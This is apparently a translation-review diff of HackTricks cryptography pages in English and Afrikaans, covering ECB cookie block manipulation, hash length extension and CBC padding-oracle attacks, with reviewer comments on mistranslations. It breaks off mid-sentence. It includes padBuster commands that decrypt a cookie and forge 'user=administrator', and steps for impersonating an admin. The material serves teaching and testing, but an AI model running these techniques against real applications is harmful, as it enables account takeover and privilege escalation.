* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# ECB
|
||||
|
||||
(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key.
|
||||
(ECB) Elektroniese Kodeboek - simmetriese enkripsieskema wat elke blok van die duidelike teks vervang deur die blok van die sleutelteks. Dit is die eenvoudigste enkripsieskema. Die hoofidee is om die duidelike teks in blokke van N-bits (afhangende van die grootte van die blok van insetdata, enkripsie-algoritme) te verdeel en dan elke blok van duidelike teks te enkripteer (de-enkripteer) met die enigste sleutel.
|
||||
|
||||
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
|
||||
|
||||
Using ECB has multiple security implications:
|
||||
Die gebruik van ECB het verskeie veiligheidsimplikasies:
|
||||
|
||||
* **Blocks from encrypted message can be removed**
|
||||
* **Blocks from encrypted message can be moved around**
|
||||
* **Blokke van die enkripteerde boodskap kan verwyder word**
|
||||
* **Blokke van die enkripteerde boodskap kan rondgeskuif word**
|
||||
|
||||
# Detection of the vulnerability
|
||||
# Opname van die kwesbaarheid
|
||||
|
||||
Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`<username>|<password>`**.\
|
||||
Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\
|
||||
You find out that the **blocks of 8B** where the **info of both users** is the same are **equals**. Then, you imagine that this might be because **ECB is being used**.
|
||||
|
||||
Like in the following example. Observe how these** 2 decoded cookies** has several times the block **`\x23U\xE45K\xCB\x21\xC8`**
|
||||
Stel jou voor jy teken verskeie kere in by 'n toepassing en jy kry **altyd dieselfde koekie**. Dit is omdat die koekie van die toepassing **`<gebruikersnaam>|<wagwoord>`** is.\
|
||||
Dan genereer jy twee nuwe gebruikers, albei met dieselfde lang wagwoord en **byna** dieselfde **gebruikersnaam**.\
|
||||
Jy kom agter dat die blokke van 8B waar die inligting van beide gebruikers dieselfde is, **gelyk** is. Jy vermoed dat dit dalk is omdat **ECB gebruik word**.
|
||||
|
||||
Soos in die volgende voorbeeld. Let op hoe hierdie **2 gedekodeerde koekies** verskeie kere die blok **`\x23U\xE45K\xCB\x21\xC8`** bevat.
|
||||
```
|
||||
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
|
||||
|
||||
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
|
||||
```
|
||||
Dit is omdat die **gebruikersnaam en wagwoord van daardie koekies verskeie kere die letter "a" bevat het** (byvoorbeeld). Die **blokke** wat **verskillend** is, is blokke wat **ten minste 1 verskillende karakter** bevat het (miskien die skeidingsteken "|" of 'n nodige verskil in die gebruikersnaam).
|
||||
|
||||
This is because the **username and password of those cookies contained several times the letter "a"** (for example). The **blocks** that are **different** are blocks that contained **at least 1 different character** (maybe the delimiter "|" or some necessary difference in the username).
|
||||
Nou hoef die aanvaller net te ontdek of die formaat `<gebruikersnaam><skeidingsteken><wagwoord>` of `<wagwoord><skeidingsteken><gebruikersnaam>` is. Om dit te doen, kan hy net **verskeie gebruikersname genereer** met **soortgelyke en lang gebruikersname en wagwoorde** totdat hy die formaat en die lengte van die skeidingsteken vind:
|
||||
|
||||
Now, the attacker just need to discover if the format is `<username><delimiter><password>` or `<password><delimiter><username>`. For doing that, he can just **generate several usernames **with s**imilar and long usernames and passwords until he find the format and the length of the delimiter:**
|
||||
| Lengte van gebruikersnaam: | Lengte van wagwoord: | Lengte van gebruikersnaam+wagwoord: | Lengte van koekie (na dekodeering): |
|
||||
| ------------------------- | -------------------- | ----------------------------------- | ----------------------------------- |
|
||||
| 2 | 2 | 4 | 8 |
|
||||
| 3 | 3 | 6 | 8 |
|
||||
| 3 | 4 | 7 | 8 |
|
||||
| 4 | 4 | 8 | 16 |
|
||||
| 7 | 7 | 14 | 16 |
|
||||
|
||||
| Username length: | Password length: | Username+Password length: | Cookie's length (after decoding): |
|
||||
| ---------------- | ---------------- | ------------------------- | --------------------------------- |
|
||||
| 2 | 2 | 4 | 8 |
|
||||
| 3 | 3 | 6 | 8 |
|
||||
| 3 | 4 | 7 | 8 |
|
||||
| 4 | 4 | 8 | 16 |
|
||||
| 7 | 7 | 14 | 16 |
|
||||
# Uitbuiting van die kwesbaarheid
|
||||
|
||||
# Exploitation of the vulnerability
|
||||
|
||||
## Removing entire blocks
|
||||
|
||||
Knowing the format of the cookie (`<username>|<password>`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it:
|
||||
## Verwydering van hele blokke
|
||||
|
||||
Met kennis van die formaat van die koekie (`<gebruikersnaam>|<wagwoord>`), om die gebruikersnaam `admin` na te boots, skep 'n nuwe gebruiker genaamd `aaaaaaaaadmin` en kry die koekie en dekodeer dit:
|
||||
```
|
||||
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
|
||||
We can see the pattern `\x23U\xE45K\xCB\x21\xC8` created previously with the username that contained only `a`.\
|
||||
Then, you can remove the first block of 8B and you will et a valid cookie for the username `admin`:
|
||||
|
||||
Ons kan die patroon `\x23U\xE45K\xCB\x21\xC8` sien wat vantevore geskep is met die gebruikersnaam wat slegs `a` bevat.\
|
||||
Daarna kan jy die eerste blok van 8B verwyder en jy sal 'n geldige koekie vir die gebruikersnaam `admin` kry:
|
||||
```
|
||||
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
## Blokke skuif
|
||||
|
||||
## Moving blocks
|
||||
In baie databasisse is dit dieselfde om te soek vir `WHERE username='admin';` of vir `WHERE username='admin ';` _(Let op die ekstra spasies)_
|
||||
|
||||
In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_
|
||||
Dus, 'n ander manier om die gebruiker `admin` na te boots, sou wees om:
|
||||
|
||||
So, another way to impersonate the user `admin` would be to:
|
||||
* Genereer 'n gebruikersnaam wat: `len(<username>) + len(<delimiter) % len(block)`. Met 'n blokgrootte van `8B` kan jy 'n gebruikersnaam genaamd `username ` genereer, met die delimiter `|` sal die stuk `<username><delimiter>` 2 blokke van 8Bs genereer.
|
||||
* Genereer dan 'n wagwoord wat 'n presiese aantal blokke vul wat die gebruikersnaam bevat wat ons wil na boots, en spasies, soos: `admin `
|
||||
|
||||
* Generate a username that: `len(<username>) + len(<delimiter) % len(block)`. With a block size of `8B` you can generate username called: `username `, with the delimiter `|` the chunk `<username><delimiter>` will generate 2 blocks of 8Bs.
|
||||
* Then, generate a password that will fill an exact number of blocks containing the username we want to impersonate and spaces, like: `admin `
|
||||
Die koekie van hierdie gebruiker sal bestaan uit 3 blokke: die eerste 2 is die blokke van die gebruikersnaam + delimiter en die derde een van die wagwoord (wat die gebruikersnaam naboots): `username |admin `
|
||||
|
||||
The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username |admin `
|
||||
**Vervang dan net die eerste blok met die laaste keer en jy boots die gebruiker `admin` na: `admin |username`**
|
||||
|
||||
**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`**
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
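Review bot: the source typo "replace the first block with the last time" was translated literally as "met die laaste keer" (with the last time) in the bolded sentence near the end of this hunk; the intended meaning is the last block, so the Afrikaans should read "Vervang dan net die eerste blok met die laaste blok en jy boots die gebruiker `admin` na". The constructed cookie values `username |admin ` and `admin |username` are correctly kept verbatim, since the block layout depends on those exact byte lengths and must not be translated.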
@ -1,66 +1,62 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Summary of the attack
|
||||
# Opsomming van die aanval
|
||||
|
||||
Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
|
||||
Stel jou voor 'n bediener wat 'n paar **data** onderteken deur 'n **geheim** by 'n bekende teksdata te **voeg** en dan daardie data te hash. As jy weet:
|
||||
|
||||
* **The length of the secret** (this can be also bruteforced from a given length range)
|
||||
* **The clear text data**
|
||||
* **The algorithm (and it's vulnerable to this attack)**
|
||||
* **The padding is known**
|
||||
* Usually a default one is used, so if the other 3 requirements are met, this also is
|
||||
* The padding vary depending on the length of the secret+data, that's why the length of the secret is needed
|
||||
* **Die lengte van die geheim** (dit kan ook gekraak word binne 'n gegewe lengtebereik)
|
||||
* **Die duidelike teksdata**
|
||||
* **Die algoritme (en dit is vatbaar vir hierdie aanval)**
|
||||
* **Die opvulling is bekend**
|
||||
* Gewoonlik word 'n verstek een gebruik, so as die ander 3 vereistes voldoen word, is dit ook die geval
|
||||
* Die opvulling varieer afhangende van die lengte van die geheim+data, daarom is die lengte van die geheim nodig
|
||||
|
||||
Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**.
|
||||
Dan is dit moontlik vir 'n **aanvaller** om **data** by te voeg en 'n geldige **handtekening** te genereer vir die **vorige data + bygevoegde data**.
|
||||
|
||||
## How?
|
||||
## Hoe?
|
||||
|
||||
Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**.
|
||||
Basies genereer die vatbare algoritmes die hasings deur eerstens 'n blok data te hash, en dan, **van** die **voorheen** geskep **hash** (toestand), voeg hulle die volgende blok data by en hash dit.
|
||||
|
||||
Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\
|
||||
If an attacker wants to append the string "append" he can:
|
||||
Stel jou voor dat die geheim "geheim" is en die data "data" is, die MD5 van "geheimdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\
|
||||
As 'n aanvaller die string "byvoeg" wil byvoeg, kan hy:
|
||||
|
||||
* Generate a MD5 of 64 "A"s
|
||||
* Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b
|
||||
* Append the string "append"
|
||||
* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"**
|
||||
* Genereer 'n MD5 van 64 "A"s
|
||||
* Verander die toestand van die voorheen geïnisialiseerde hash na 6036708eba0d11f6ef52ad44e8b74d5b
|
||||
* Voeg die string "byvoeg" by
|
||||
* Voltooi die hash en die resulterende hash sal 'n **geldige een wees vir "geheim" + "data" + "opvulling" + "byvoeg"**
|
||||
|
||||
## **Tool**
|
||||
## **Hulpmiddel**
|
||||
|
||||
{% embed url="https://github.com/iagox86/hash_extender" %}
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||
Jy kan hierdie aanval goed verduidelik vind by [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
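Review bot: the worked MD5 example under "Hoe?" translates the literal inputs ("secret" to "geheim", "append" to "byvoeg") but keeps the hash 6036708eba0d11f6ef52ad44e8b74d5b, which the English text gives for "secretdata"; after the change the stated hash no longer corresponds to the stated input, so the example cannot be reproduced. Keep the string literals untranslated, e.g. `die geheim "secret" is en die data "data" is, die MD5 van "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b`, and likewise "append" in the bullet list and in the final "valid one for ..." bullet. Minor: the bolding on "hashing a block of data" and "add the next block of data" was dropped in the translated paragraph.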
@ -1,38 +1,36 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# CBC - Cipher Block Chaining
|
||||
|
||||
In CBC mode the **previous encrypted block is used as IV** to XOR with the next block:
|
||||
In CBC-modus word die **vorige versleutelde blok as IV** gebruik om te XOR met die volgende blok:
|
||||
|
||||
![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png)
|
||||
|
||||
To decrypt CBC the **opposite** **operations** are done:
|
||||
Om CBC te ontsluit, word die **teenoorgestelde** **bewerkings** gedoen:
|
||||
|
||||
![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png)
|
||||
|
||||
Notice how it's needed to use an **encryption** **key** and an **IV**.
|
||||
Let daarop dat 'n **versleutelingsleutel** en 'n **IV** gebruik moet word.
|
||||
|
||||
# Message Padding
|
||||
# Boodskapvulling
|
||||
|
||||
As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\
|
||||
Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`.
|
||||
Aangesien die versleuteling in **vasgestelde** **blokke** **uitgevoer** word, word **vulling** gewoonlik in die **laaste** **blok** benodig om sy lengte te voltooi.\
|
||||
Gewoonlik word **PKCS7** gebruik, wat 'n vulling genereer wat die **aantal** **byte** **benodig** om die blok te voltooi, **herhaal**. Byvoorbeeld, as die laaste blok 3 byte kortkom, sal die vulling `\x03\x03\x03` wees.
|
||||
|
||||
Let's look at more examples with a **2 blocks of length 8bytes**:
|
||||
Kom ons kyk na meer voorbeelde met 'n **2 blokke van 8 byte**:
|
||||
|
||||
| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 |
|
||||
| ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
|
||||
|
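Review bot: "'n **2 blokke van 8 byte**" pairs the singular indefinite article with a plural; suggest "twee blokke van 8 byte elk" (the English "2 blocks of length 8bytes" is itself awkward). Also, "in vasgestelde blokke uitgevoer" drops "size" from "fixed size blocks"; "in blokke van vaste grootte" keeps the point the paragraph depends on, namely that the block length is constant, which is why the last block needs padding.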
@ -41,51 +39,43 @@ Let's look at more examples with a **2 blocks of length 8bytes**:
|
|||
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
|
||||
| P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
|
||||
|
||||
Note how in the last example the **last block was full so another one was generated only with padding**.
|
||||
Let daarop hoe in die laaste voorbeeld die **laaste blok vol was, dus is nog een gegenereer slegs met vulling**.
|
||||
|
||||
# Padding Oracle
|
||||
|
||||
When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**.
|
||||
Wanneer 'n toepassing versleutelde data ontsluit, sal dit eers die data ontsluit; dan sal dit die vulling verwyder. Tydens die skoonmaak van die vulling, as 'n **ongeldige vulling 'n waarneembare gedrag teweegbring**, het jy 'n **padding-orakel kwesbaarheid**. Die waarneembare gedrag kan 'n **fout**, 'n **gebrek aan resultate**, of 'n **stadiger reaksie** wees.
|
||||
|
||||
If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**.
|
||||
As jy hierdie gedrag opspoor, kan jy die **versleutelde data ontsluit** en selfs **enige duidelike teks versleutel**.
|
||||
|
||||
## How to exploit
|
||||
|
||||
You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do
|
||||
## Hoe om uit te buit
|
||||
|
||||
Jy kan [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) gebruik om hierdie tipe kwesbaarheid uit te buit of net die volgende doen
|
||||
```
|
||||
sudo apt-get install padbuster
|
||||
```
|
||||
|
||||
In order to test if the cookie of a site is vulnerable you could try:
|
||||
|
||||
Om te toets of die koekie van 'n webwerf kwesbaar is, kan jy probeer:
|
||||
```bash
|
||||
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
|
||||
```
|
||||
**Kodering 0** beteken dat **base64** gebruik word (maar ander is beskikbaar, kyk na die hulpmenu).
|
||||
|
||||
**Encoding 0** means that **base64** is used (but others are available, check the help menu).
|
||||
|
||||
You could also **abuse this vulnerability to encrypt new data. For example, imagine that the content of the cookie is "**_**user=MyUsername**_**", then you may change it to "\_user=administrator\_" and escalate privileges inside the application. You could also do it using `paduster`specifying the -plaintext** parameter:
|
||||
|
||||
Jy kan ook **misbruik maak van hierdie kwesbaarheid om nuwe data te enkripteer. Byvoorbeeld, stel jou voor dat die inhoud van die koekie is "**_**gebruiker=MyGebruikersnaam**_**", dan kan jy dit verander na "\_gebruiker=administrateur\_" en voorregte binne die toepassing verhoog. Jy kan dit ook doen deur `paduster` te gebruik en die -plaintext** parameter te spesifiseer:
|
||||
```bash
|
||||
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
|
||||
```
|
||||
|
||||
If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter.
|
||||
|
||||
As die webwerf kwesbaar is, sal `padbuster` outomaties probeer om te vind wanneer die padding-fout plaasvind, maar jy kan ook die foutboodskap aandui deur die **-error** parameter te gebruik.
|
||||
```bash
|
||||
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
|
||||
```
|
||||
## Die teorie
|
||||
|
||||
## The theory
|
||||
|
||||
In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**.
|
||||
In **opsomming**, jy kan begin om die versleutelde data te ontsluit deur die regte waardes te raai wat gebruik kan word om al die **verskillende opvullings** te skep. Dan sal die padding-orakelaanval begin om byte van die einde na die begin te ontsluit deur te raai watter die regte waarde sal wees wat **'n opvulling van 1, 2, 3, ens. skep**.
|
||||
|
||||
![](<../.gitbook/assets/image (629) (1) (1).png>)
|
||||
|
||||
Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\
|
||||
In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\
|
||||
Finally, each intermediary byte is **XORed** with the previous encrypted bytes (E0 to E7). So:
|
||||
Stel jou voor jy het 'n paar versleutelde teks wat **2 blokke** beslaan, gevorm deur die bytes van **E0 tot E15**.\
|
||||
